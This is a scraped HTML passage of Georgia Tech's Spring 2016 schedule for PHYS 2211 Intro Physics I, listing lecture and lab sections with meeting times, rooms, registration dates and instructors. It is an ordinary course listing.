<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21019">Intro Physics I - 21019 - PHYS 2211 - C</a></th>
</tr>
<tr>
<td class="dddefault">
Students must also register for a Lab Section that begins
with the letter C. No lab exemptions are offered.
This class will have evening tests approximately once every
three weeks.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 12:55 pm</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Simon Sponberg (<abbr title="Primary">P</abbr>)<a href="mailto:simon.sponberg@physics.gatech.edu" target="Simon Sponberg"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L1</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Simon Sponberg (<abbr title="Primary">P</abbr>)<a href="mailto:simon.sponberg@physics.gatech.edu" target="Simon Sponberg"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21004">Intro Physics I - 21004 - PHYS 2211 - C01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21005">Intro Physics I - 21005 - PHYS 2211 - C02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21006">Intro Physics I - 21006 - PHYS 2211 - C03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 1:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21007">Intro Physics I - 21007 - PHYS 2211 - C04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 131</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21008">Intro Physics I - 21008 - PHYS 2211 - C05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21009">Intro Physics I - 21009 - PHYS 2211 - C06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 6:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21010">Intro Physics I - 21010 - PHYS 2211 - C07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21585">Intro Physics I - 21585 - PHYS 2211 - C08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 127</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 6:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22034">Intro Physics I - 22034 - PHYS 2211 - C09</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21017">Intro Physics I - 21017 - PHYS 2211 - K</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211K
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">9:05 am - 9:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L3</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
